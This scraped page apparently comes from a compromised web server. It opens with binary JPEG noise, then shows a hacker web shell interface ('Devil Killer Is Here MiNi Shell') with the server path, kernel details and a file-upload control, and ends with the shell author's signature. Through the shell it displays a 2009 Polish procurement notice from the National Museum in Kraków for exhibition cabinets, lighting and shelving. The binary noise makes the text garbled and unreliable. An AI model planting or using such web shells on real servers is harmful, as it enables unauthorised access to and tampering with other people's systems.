JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090515/150942-N-2009.html

<p class="kh_header"><b>Kraków: Wykonanie kiosków ekspozycyjnych i gablot wraz z oświetleniem oraz postumentów wg projektu do Pałacu Bpa E. Ciołka, a także ustawienie i zamocowanie wszystkich wykonanych elementów  - w ramach projektu Kraków na wyciągnięcie ręki. Rzeźba architektoniczna w oryginałach kamiennych i zabytkowych odlewach gipsowych - wystawa w Muzeum Narodowym w Krakowie.</b><br>
<b>Numer ogłoszenia: 150942 - 2009; data zamieszczenia: 15.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Narodowe w Krakowie , Al. 3-go Maja 1, 30-062 Kraków, woj. małopolskie, tel. 012 2955621, faks 012 2955555.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie kiosków ekspozycyjnych i gablot wraz z oświetleniem oraz postumentów wg projektu do Pałacu Bpa E. Ciołka, a także ustawienie i zamocowanie wszystkich wykonanych elementów  - w ramach projektu Kraków na wyciągnięcie ręki. Rzeźba architektoniczna w oryginałach kamiennych i zabytkowych odlewach gipsowych - wystawa w Muzeum Narodowym w Krakowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS OGÓLNY 

	Przedmiotem zamówienia jest wykonanie zgodnie z projektem,  dostawa i montaż mebli stanowiących wyposażenie  magazynu studyjnego ulokowanego w piwnicach  Pałacu  Biskupa Erazma Ciołka, mieszczącego się w Krakowie, przy ul. Kanoniczej 17. W skład wyposażenia wchodzą: gabloty wiszące oraz wolnostojące, postumenty, szafki, kioski ekspozycyjne, zabudowa ścian konstrukcją stalowa tworząca regał na eksponaty, elementy pomocnicze takie jak stojaki oraz pomocniki jezdne służące do transportu obiektów.

Przedmiot zamówienia należy wykonać dwuetapowo:
I etap: nie wcześniej niż 02 listopada 2009r do 30 listopada 2009r
I etap obejmuje wykonanie, dostawę oraz skręcenie w miejscu docelowym dwóch kiosków ekspozycyjnych w sali nr 1
 II etap: nie wcześniej niż po odbiorze I etapu do 12.02.2010r
II etap obejmuje pozostałe elementy wyposażenia wg projektu


SZCZEGÓŁOWY OPIS ELEMENTÓW:

1.Gabloty stojące i wiszące

	Wykonane z masywu sosnowego, konstrukcji wieńcowo płycinowej. Trzon gablot stojących stanowią szuflady lub półki zamykane na drzwiczki. Szuflady wysuwane na prowadnicach . Drewno wszystkich gablot odpowiednio bejcowane w kolorze szarym (po wcześniejszym wykonaniu próbki i zatwierdzeniu koloru przez koordynatora projektu) i wykończone na półmat. Z tyłu za gablotami należy umieścić świetlówki podświetlające strukturę ścian. Gabloty mają wbudowane paski ledowe.
Szkło zastosowane w gablotach musi być szkłem bezpiecznym.

2. Kiosk ekspozycyjno - magazynowy

	Zbudowany z konstrukcji stalowej, w której ruszt dolny i górny połączony jest słupami. Ze względu na ograniczony wymiarami otworów drzwiowych dostęp do pomieszczeń docelowych dla kiosków konstrukcja ich musi być konstrukcja skręcana z wykonanych wcześniej prefabrykatów w miejscu ich docelowej lokalizacji w magazynie (w tym celu przed przygotowaniem oferty należy dokonać wizji lokalnej - Zamawiający ustala jej termin na dzień 21/05/2009 r. na godz. 12:00). Ściany oraz sufit kiosku stanowią szyby hartowane. Szyby ścian otwierane na zewnątrz, zawiasy ukryte za demontowanymi deskami cokołu dolnego oraz gzymsu górnego, szczeliny pomiędzy szybami należy wypełnić wyjmowanymi uszczelkami sylikonowymi. Szyba sufitu w kolorze mlecznym. Podłoga wykonana z gretingu z masywu sosnowego. 
Sposób wykończenia powierzchni drewnianych - lakier bezbarwny półmat.
Sposób wykończenia powierzchni metalowych - lakier czarny matowy.
Szyby ścian montowane dopiero po umieszczeniu w kioskach eksponatów.

3. Postumenty

	Wykonane z masywu sosnowego bejcowanego na kolor szary wykończone na półmat.

4. Pomocnik na kółkach

	Wykonane z rurek stalowych, lakierowane na kolor czarny matowy, wraz ze składanym krzesełkiem drewnianym.

5. Kobyłki metalowe.

	Wykonane z rurek stalowych, lakierowane na kolor czarny matowy, wraz z blatem z płyty stolarskiej.

6. Stelaż - regał

	Stelaż złożony jest z rury kwadratowej 35x35x2 lakierowanej w kolorze czarno grafitowym matowym, połączonej ze sobą łącznikami z blachy oraz prętów nierdzewnych. Półki wykonane z listew z masywu sosnowego o gr 25mm oraz szerokości 50mm wykończone lakierem bezbarwnym matowym.
Przedmiotem zamówienia są elementy stelaża:
- rura kwadratowa jw. 6mb -213 szt
- łączniki - 2180 szt
- zaślepki -770 szt
- stopki - 250 szt
- listwy sosnowe szer 5cm gr 2,5cm - 2400 mb (długości listw do ustalenia w czasie realizacji)

ELEMENTY OŚWIETLENIA:

	Gabloty i kioski ekspozycyjne powinny być wykonane razem z systemem oświetlenia ( dopasowane do ich wymiarów). Kioski ekspozycyjne zasilane od góry z gniazdem zasilającym na dole wewnątrz kiosku do podłączenia innych urządzeń elektrycznych.
Świetlówka w oprawie do wyboru z możliwością świecenia w górę i w dół. Świetlówka śr. 16mm, LUMILUX DE LUXE TSHQ, do pracy ze statecznikiem elektronicznym, trzonek G5.
Źródła światła dopasowane do wielkości kiosków, w najgorszym przypadku:
- świetlówka 24W/940 Ra>90% (pasmowa) dł 549, śr 16mm (Im>25°C 1100-1400)
Gabloty z tyłu podświetlone świetlówką, wewnątrz oświetlenie listwami ledowymi.
Ilości:
1.	Świetlówki jak w opisie                                                               65 szt
2.	Lampa doświetlająca kioski ekspozycyjne (kolorystycznie dobrana do okładziny drewnianej)                                                                  26 szt
3.	Listwy ledowe, każda o mocy pow. 1W                                       17 mb


WARUNKI REALIZACJI:

1.	Meble muszą być reprezentacyjne - wykonanie precyzyjnie, starannie i na wysokim poziomie estetycznym.
2.	Zastosowany osprzęt musi być bardzo dobrej jakości (zawiasy, uchwyty, podpórki, mocowania itp.)
3.	Zastosowane szyby muszą być szybami bezpiecznymi.
4.	Przed przystąpieniem do realizacji wszelkie wymiary sprawdzić na miejscu.
5.	Zamawiający przewiduje wizję lokalną w dniu 21/05/2009 r. o godzinie 12:00 w Kamienicy Bp. E. Ciołka przy ul. Kanoniczej 17 w Krakowie
6.	Wykonawca zobowiązany jest przedstawić  szczegółową wycenę dla każdego  etapu obejmującą cenę netto i brutto każdego  elementu aranżacyjnego.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.02.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Do postępowania przetargowego zostaną dopuszczeni Wykonawcy spełniający warunki udziału w postępowaniu tj.:
a/posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj. posiadający: 
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub  zgłoszenia do ewidencji  działalności gospodarczej, wystawione  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b/ posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do  wykonania zamówienia;
- wykonali w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy to z tego okresu minimum 1 pracę stolarską obejmującą wykonanie mebli drewnianych oraz gablot wystawienniczych. Wykaz ma zawierać informacje na temat przedmiotu zamówienia, wartości oraz dat i miejsca wykonania.
Wykonawca dołącza do wykazu zrealizowanych zamówień dokumenty potwierdzające należyte ich wykonanie. 
c/ znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d/  nie podlegają wykluczeniu z udziału w postępowaniu na podstawie art.  24 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu przedstawią następujące dokumenty i oświadczenia:
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub  zgłoszenia do ewidencji  działalności gospodarczej, wystawione  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt 9 ustawy dotyczącą Wykonawcy jako podmiotu - wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
c)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy dotyczące wszystkich urzędujących członków władz Wykonawcy, ujawnionych w rejestrze handlowym (w przypadku spółki cywilnej dotycząca każdego z przedsiębiorców, dla osób fizycznych prowadzących działalność gospodarczą - wystawiona personalnie na ich osobę), wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
d)	aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
e)	aktualne zaświadczenie z właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
f)	wykaz wykonanej w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy to z tego okresu minimum 1 pracy stolarskiej obejmującej wykonanie mebli drewnianych oraz gablot wystawienniczych. Wykaz ma zawierać informacje na temat przedmiotu zamówienia, wartości oraz dat i miejsca wykonania.
Wykonawca dołącza do wykazu zrealizowanych zamówień dokumenty potwierdzające należyte ich wykonanie. 
g)	oświadczenie o spełnianiu warunków udziału w postępowania według wzoru - załącznik nr 3 specyfikacji,


3.2.1. Ocena spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych przez wykonawcę dokumentów i oświadczeń zgodnie z zasadą: spełnia/nie spełnia.
 W przypadku dokumentów określonych w punkcie  a, b, c, d, e, Wykonawca może przedstawić kserokopię potwierdzoną za zgodność z oryginałem.
 Jeżeli  Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast  dokumentów o których mowa w pkt. a, b, d, e - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające iż:
- nie otwarto jego likwidacji i upadłości;
- nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast  dokumentów o których mowa w pkt. 3.2 c - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
 w przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
- dokument wymieniony w punktach  f, Wykonawcy mogą złożyć wspólnie.
-pozostałe dokumenty każdy z Wykonawców składa oddzielnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.muzeum.krakow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Al. 3-go Maja 1, 30-062 Kraków, pok. nr 050.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2009 godzina 10:00, miejsce: pok. nr 050 Al. 3-go Maja 1, 30-062 Kraków.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt dofinansowany z Europejskiego Funduszu Rozwoju Regionalnego w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013 (Oś Priorytetowa 3. Turystyka i przemysł kulturowy, Działanie 3.3. Instytucje kultury, Schemat B: Organizacja imprez kulturalnych o znaczeniu regionalnym i ponadregionalnym).

Creat By MiNi SheLL
Email: jattceo@gmail.com